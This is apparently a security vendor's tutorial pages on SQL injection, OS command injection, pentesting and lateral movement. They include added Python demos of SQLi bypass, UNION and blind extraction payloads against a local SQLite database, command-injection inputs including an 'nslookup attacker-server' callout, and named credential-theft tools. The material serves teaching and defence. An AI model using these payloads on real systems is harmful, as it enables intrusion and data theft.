This October is Cyber Security Awareness Month, an event designed to educate people about information security and the steps they […]
You’ll often see the terms cyber security and information security used interchangeably. That’s because, in their most basic forms, they […]
The war against cyber crime has, for some time, been a losing battle. Organisations are reporting record numbers of data […]
Please note new versions of ISO 27001 and ISO 27002 have now been published. To learn more about what these […]
Cyber liability insurance helps organisations cover the financial costs of a data breach. It’s essential for any business that wishes […]
What is SQL Injection? SQLi Explained
An overview of what SQL Injection is, how the attack works, and the risk it poses to your organisation.

What is SQL Injection?
SQL injection is a web application vulnerability that lets an attacker supply SQL syntax as user input which the application then incorporates into a query sent to the backend database, so the input is processed as part of the SQL statement rather than as data. The root cause is building the query by concatenating untrusted input into the SQL text instead of passing it through parameterised (prepared) statements. Successful exploitation allows an attacker to alter the meaning of the application's SQL statements.

How Does SQL Injection Work?
SQL Injection (SQLi) occurs when an application lacks the controls needed to stop an attacker inserting (injecting) fragments of their own SQL into a statement. A first probe, such as a single quote, typically breaks the statement's syntax and produces an error or other unintended behaviour, which tells the attacker that the input may be reaching the database unescaped. After this initial proof of concept the attacker crafts more advanced statements to exploit the vulnerability.

Concerned about SQL Injection? Have your web application assessed for SQL Injection using our website security audit assessment service.

Risks: Why Are SQL Injection Attacks Dangerous?
Successful exploitation of a SQL injection vulnerability can lead to complete exfiltration of user data (dumping the database), modification or deletion of data, full compromise of the database server (where the database account is able to write files or execute commands) and a foothold from which the attacker can move laterally through the network.

Different Types of SQL Injection Attacks:
The same principle underlies every SQL injection attack; what differs is how the attacker confirms the vulnerability and extracts data, which depends on what the application reveals in its responses. The common variants found in modern web applications are:
- Blind SQLi
- Error Based SQLi
- Time Based SQLi
- UNION SELECT SQLi
- Out-of-Band (OOB) SQLi

Learn More: What is OS Command Injection?

What is Error Based SQL Injection?
Error Based SQL Injection occurs when an attacker supplies SQL special characters (a single quote, for example) as input to a web application in an attempt to break the SQL statement. If the input reaches the database unescaped and the application returns the database error in its response, the reflected error confirms the injection point and often reveals details such as the database engine in use and the structure of the query.

Learn More: What is VAPT?

What is Blind SQL Injection?
Blind SQL Injection occurs when injected input is processed by the backend database but produces no direct output (such as an error message) in the web front end. The attacker instead injects a statement whose effect can be observed indirectly; if the action completes, it confirms that the input is being processed as SQL and that the web application is vulnerable. Examples of Blind SQL Injection:
- Modifying or adding data (for example adding a user or changing a user's password)
- Performing time-based SQL injection
- Performing OOB SQL Injection

Learn More: What is Pentesting?

What is Time Based SQL Injection?
Time based SQL injection is a form of blind SQL injection in which a payload that delays the database's response (a sleep or a deliberately heavy computation) is used to verify the vulnerability: if the response arrives after roughly the requested delay, the injected SQL was executed. The attacker would enter a payload the […]
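The following is an added, self-contained illustration of the injection variants described above (error based, UNION, and boolean-based blind); it is not code from the original article. It runs the same login query built two ways against an in-memory SQLite database: once by string concatenation, once parameterised. The schema, table names, user rows and the "secrets" table are constructed for the demo (passwords are stored in plaintext only so the extraction is visible; a real application would hash them). Time-based SQLi is not shown because SQLite has no sleep function.

```python
"""Added example: the same login query built two ways against an in-memory
SQLite database, plus the classic SQLi confirmation and extraction steps."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample schema and rows; all names are assumptions for this demo.
    # Plaintext passwords are used only so the blind extraction below is visible.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('alice', 'Winter2024!');
        INSERT INTO users (username, password) VALUES ('bob', 'hunter2');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, note TEXT);
        INSERT INTO secrets (note) VALUES ('db backup key: CONSTRUCTED-EXAMPLE');
    """)
    return con


def login_vulnerable(con, username, password):
    # Untrusted input is concatenated into the SQL text, so quotes, comments
    # and keywords in the input change the structure of the statement.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    # Parameterised query: values travel separately from the statement text,
    # so the database only ever treats them as data, never as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def probe_error_based(con):
    # First probe of an assessment: a lone quote breaks the statement syntax.
    # That error leaking into an HTTP response is the "error based" signal.
    try:
        login_vulnerable(con, "'", "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def bypass_login(con):
    # Tautology plus an SQL comment to discard the password check entirely.
    return login_vulnerable(con, "' OR '1'='1' -- ", "wrong")


def union_dump(con):
    # UNION SELECT: append rows from another table to the query's own result.
    return login_vulnerable(con, "' UNION SELECT note FROM secrets -- ", "x")


def blind_extract_password(con, target_user, max_len=40):
    # Boolean-based blind SQLi: the only oracle is "did the login return a row
    # or not"; each query tests one candidate character at one position.
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = (f"' OR (SELECT unicode(substr(password,{pos},1)) FROM users "
                       f"WHERE username='{target_user}') = {code} -- ")
            if login_vulnerable(con, payload, "irrelevant"):
                recovered += chr(code)
                break
        else:
            break  # no printable character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("error probe :", probe_error_based(db))
    print("bypass      :", bypass_login(db))
    print("union dump  :", union_dump(db))
    print("blind       :", blind_extract_password(db, "alice"))
    print("safe bypass?:", login_safe(db, "' OR '1'='1' -- ", "wrong"))
```

The blind routine needs one request per candidate character, which is why real tools binary-search the character code rather than scanning it linearly; the structure of the oracle is the same. Note that `login_safe` returns nothing for every payload above, because with a bound parameter the quote and comment characters are simply part of the compared value.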
What is Pentesting?
What a Pentest is, and how it can be used to help improve the security posture of your organisation.

What is a Pentest?
Penetration testing, also known as pen testing, is an authorised, simulated attack against an organisation's network or applications to identify vulnerabilities and security issues. Vulnerabilities discovered during a penetration test are exploited to confirm their severity and to compromise the affected machines. Compromised machines or applications are then used to gain further access into the organisation's network; this is done to establish the level of access a real attacker could obtain.

Pentest Process Overview:
- Authorised attack simulation
- Identifies vulnerabilities
- Identified vulnerabilities are exploited
- Privilege escalation is performed
- Discovered vulnerabilities are chained together to gain a higher level of access
- Compromised machines are used to access the rest of the network

Pentesting is typically performed against a company's servers, web applications, external network infrastructure and mobile applications. The assessment is manual, with industry standard commercial and open source tools used to assist the testing process. Once a vulnerability has been successfully exploited, a tester may use the machine as an entry point to other machines within the network, reaching data that would normally be protected by firewalls or require higher-privileged accounts. Penetration testing helps quantify the risk by showing what data a potential attacker could actually access.

Pentesting is typically broken down into the following phases:
- Scoping
- Reconnaissance
- Discovery
- Exploitation
- Control
- Advancement
- Reporting

What is Manual Pentesting?
Manual pen testing combines best in class security auditing software and tools with human expertise, using the tester's judgement to confirm each finding and rule out false positives in the final report.
Automated software solutions cannot identify business logic flaws; these require manual testing informed by technical experience. Combining both approaches is commonly referred to as Vulnerability Assessment and Penetration Testing (VAPT); see our what is VAPT resource for more information. Aptive provide a consultant-led manual web app security audit service to help identify logic flaws and complex application security issues.

Pentest FAQ
How Much Does a Pentest Cost?
This depends on the size and complexity of what requires assessment; contact us for an estimate or read more on our penetration testing services page.

Pentest vs Vulnerability Assessment?
A pentest is performed manually by a security professional, who exploits the findings to confirm them; a vulnerability assessment is an automated scan conducted by software, which reports potential issues without exploiting them.

What is the Purpose of Pentesting?
A pentest assesses the security of IT infrastructure, APIs or web / mobile applications by attempting to exploit discovered vulnerabilities in a controlled way. The vulnerabilities are then documented, giving the organisation an overview of the discovered issues and their associated risks so that it can remediate them and then have the issues retested to verify that the remediation was successful.

Learn more about pentesting in our Cyber Security Academy.
What is Penetration Testing? (Pen Testing)
A penetration test uses ethical hackers to carry out planned attacks against a company's infrastructure to identify security vulnerabilities that require fixing, such as missing patches. Pen testing is a crucial component of a comprehensive web application security approach.

What is a Pentest?
Penetration testing, or pen testing, involves authorised simulated attacks on an organisation's network or applications to pinpoint vulnerabilities and security concerns. The discovered vulnerabilities are exploited to confirm their severity and to compromise machines. Machines or applications compromised in the process are used to access the organisation's network, helping to assess the level of access a potential attacker could gain.

Penetration Testing Overview: How The Process Works
Penetration tests should be conducted by skilled, ethical professionals, and the organisation must be aware of and approve the testing activities in advance to prevent unnecessary disruption. The goal is to provide insight into security weaknesses and help the organisation improve its overall cybersecurity posture.

Who Performs Penetration Testing
There are various types of penetration test, each focusing on a specific aspect of a system's security. Common types include:
- Black Box Testing: Testers have little or no prior knowledge of the system, simulating an external attacker's perspective.
- White Box Testing: Testers have full knowledge of the system, including source code and architecture, simulating an insider's perspective.
- Grey Box Testing: Testers have partial knowledge of the system, combining elements of black and white box testing.
- External Testing: Assessing the security of externally facing systems, such as websites and servers.
- Internal Testing: Simulating an attack from within the organisation to identify vulnerabilities that could be exploited by insiders or by an attacker who has already gained a foothold.
- Web App Security Testing: Focusing specifically on the security of web applications to uncover vulnerabilities such as SQL injection or cross-site scripting.
- Network Penetration Testing: Evaluating the security of network infrastructure, identifying weaknesses in routers, switches and other network devices.
- Social Engineering Testing: Assessing human behaviour and susceptibility to manipulation, often using tactics such as phishing.
- Mobile App Security Testing: Evaluating the security of mobile apps to identify vulnerabilities and potential exploits.

Which type of penetration test to perform depends on the organisation's specific goals and requirements. The ultimate goal of a penetration test is to give the organisation insight that helps it strengthen its cybersecurity defences, mitigate risk and prevent security incidents.

What Happens After a Penetration Test:
Penetration testing is a vital element in bolstering an organisation's cybersecurity defences. To employ it effectively, the first step is to define clear objectives: the specific goals of the test and which aspects of the organisation's security need to be assessed. Once the objectives are established, the next step is to define the scope precisely, specifying the systems, networks and applications that will be tested so that the assessment stays focused and makes the best use of the available time. The approach should be tailored to the specific needs and environment of the organisation. A […]
What is OS Command Injection?
An overview of what OS Command Injection is, how to detect and exploit it, and how to help prevent the vulnerability.

What is OS Command Injection?
OS Command Injection occurs when an application passes user-supplied input to the underlying operating system as part of a command line, and the operating system executes that input as an OS command. The vulnerability is caused by the application lacking the correct controls, such as input validation or sanitisation, to stop dangerous input (shell metacharacters such as ; | & $( ) and backticks) from being passed through to the shell and interpreted as command syntax.

The Impact of OS Command Injection
If successfully exploited, OS Command Injection gives an attacker or malicious user command execution on the target with the same permissions as the web server process. Depending on the configuration of the target and the level of security hardening that has been carried out (or the lack thereof), successful exploitation could result in the attacker gaining complete control of the vulnerable system, exfiltrating sensitive data or performing privilege escalation and lateral movement.

Are you concerned about OS Command Injection? Aptive can perform a web app security test to help identify this and other injection attacks.

How to Identify OS Command Injection
A vulnerable input parameter is the typical entry point for command injection; however other entry points, such as HTTP headers, have also been found to be vulnerable. A typical command injection example:
https://www.example.com/function.php=blah|test123
Here the pipe character terminates the intended command and runs test123 as a second command. If the parameter is vulnerable and the application returns the error in its response, a "command not found" error for test123 would be reflected.

The Different Types of OS Command Injection
Similar to SQL Injection, there are different types of command injection vulnerability:

What is Error Based Command Injection
The injected command induces an error message which is returned (reflected) in the web application's response.
What is Blind Command Injection
The target application is vulnerable to command injection, but no output or error is rendered by the application. In this case the attacker performs a proof of concept using a time based payload, an out-of-band channel, or by redirecting the command's output to a file location they can read, such as the web root. A typical example is echo test123 > /var/www/html/test.txt; the attacker then browses to the web root to check for the command output in test.txt.

What is Time Based Command Injection
The injected command uses a time based payload, such as ping -c 10 127.0.0.1 (which takes roughly nine seconds to complete) or sleep 10; the web server's response time is then measured to see whether it roughly matches the delay introduced by the injected payload.

What is Out-of-Band (OOB) Command Injection
The injected OS command uses an out-of-band method of communication to prove that the target operating system executed it as a command: for example a DNS lookup of, or an HTTP request to, an attacker controlled server using nslookup attacker-server (URL-encoded in the request as nslookup+attacker-server), with the attacker watching their server's logs for the incoming query.

Learn more: Learn more about what pentesting is and how it can help your organisation identify security issues.

How to Prevent […]
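The following is an added, runnable illustration of the identification and prevention points made above; it is not code from the original article. It models a hypothetical "look up this host" feature three ways: spliced into a shell command line (vulnerable), shell-quoted with `shlex.quote` (acceptable only when a shell is unavoidable), and validated against an allow-list then passed as a separate argv element with no shell (the preferred fix). `echo` stands in for the real command (ping, nslookup) so that it runs offline, and the time based probe injects a `sleep` in the way the section describes. The function names, the regex and the sample inputs are assumptions made for the demo.

```python
"""Added example: OS command injection, vulnerable and hardened forms, plus a
time based probe of the kind used to confirm blind command injection."""
import re
import shlex
import subprocess
import time

# Allow-list for a hostname: letters, digits, dots and hyphens only (assumed policy).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def lookup_vulnerable(host: str) -> str:
    """Hypothetical 'resolve this host' feature, built the unsafe way."""
    # The user-controlled value is spliced into a command line that /bin/sh
    # parses, so ; | & $( ) in `host` become shell syntax rather than data.
    # `echo` stands in for the real tool so the demo runs offline.
    cmd = f"echo {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_quoted(host: str) -> str:
    """If a shell really is unavoidable, quote the value so it is one literal word."""
    cmd = f"echo {shlex.quote(host)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_safe(host: str) -> str:
    """Preferred fix: validate against an allow-list, then pass argv with no shell."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("rejected: not a plain hostname")
    # A list argv goes straight to execve(); there is no shell to interpret it.
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


def is_rejected(host: str) -> bool:
    """True when the hardened variant refuses the input before running anything."""
    try:
        lookup_safe(host)
        return False
    except ValueError:
        return True


def time_based_probe(lookup, delay: float = 1.0) -> bool:
    """Blind, time based confirmation: inject a sleep and check whether the
    response is held up by about that long. True means the injection ran."""
    probe = f"example.com; sleep {int(delay)}"
    start = time.monotonic()
    try:
        lookup(probe)
    except ValueError:
        return False  # input rejected before any command executed
    return time.monotonic() - start >= delay * 0.9


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print("vulnerable:", repr(lookup_vulnerable(payload)))
    print("quoted    :", repr(lookup_quoted(payload)))
    print("safe      :", "rejected" if is_rejected(payload) else lookup_safe(payload))
    print("time probe against vulnerable:", time_based_probe(lookup_vulnerable))
```

Note that quoting alone (`lookup_quoted`) neutralises the metacharacters but still leaves a shell in the call path; the allow-list plus list-form argv removes the shell entirely, which is why it is the form to aim for.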
Lateral Movement Explained
An overview of Lateral Movement and how it is used by cyber attackers and threat actors, and during a penetration test or red team engagement.

What is Lateral Movement?
Lateral movement is the technique a cyber attacker or threat actor uses, after gaining an initial foothold, to traverse the rest of the network. An attacker typically performs lateral movement to obtain credentials or other sensitive data that grants access to more endpoints or allows privilege escalation. Aptive use lateral movement to simulate the role of a real attacker and demonstrate the risk of an external breach to an organisation, showing how far a malicious user could travel through the network and what sensitive information they could reach.

Real World Example of Lateral Movement: Cryptocurrency Mining
Lateral movement has been leveraged by attackers and automated tools to compromise as many hosts as possible in order to mine cryptocurrency on them.

How do Attackers Gain Access to the Network?
Some of the most common entry points are unpatched systems, poorly hardened systems, vulnerable web applications, phishing and malware infection. For an in-depth answer specific to your organisation, consider requesting a quote for our penetration testing service.

Lateral Movement Process
Lateral movement requires the attacker to find a way to move through the target network. Privilege escalation on the entry point machine may or may not be required, depending on the privilege level of the account originally compromised and whether the host has previously undergone a build hardening review.

Environment Mapping (Recon)
The attacker learns the network: the subnet structure, username and host naming conventions, and what threat detection systems are in place, such as anti-virus.
This enumeration allows the attacker to make informed decisions about how to pivot through the network while trying to evade detection.

Lateral Movement Techniques
To move through the network an attacker needs either to exploit a service such as SSH or RDP, or to obtain valid credentials, whether via social engineering, by cracking captured hashes or by dumping credentials from a compromised host. Below are a number of techniques an attacker could leverage to move through the network:
- Local Enumeration – Identify stored passwords in shell history files, configuration files or locally stored text files.
- SSH Keys – Locally stored SSH private keys are an easy way for an attacker to perform lateral movement via SSH to any host that trusts them.
- SSH Hijacking – Various techniques exist that allow an attacker to hijack an existing SSH session (for example through a forwarded agent socket or a ControlMaster socket) and gain access to downstream servers.
- Responder – A tool which performs LLMNR and NBT-NS poisoning: it answers name resolution requests for names that DNS could not resolve, pretending to be the requested host, so the victim authenticates to the attacker's machine and hands over its NTLMv2 challenge-response, which can be cracked offline using tools like Hashcat.
- Mimikatz – A tool which extracts credentials (plaintext passwords, NTLM hashes and Kerberos tickets) from LSASS memory.
- Pass the Hash – A technique where a captured NTLM hash is presented directly to the service for authentication, removing the need to crack the hash to recover the password.
- Keyloggers – A […]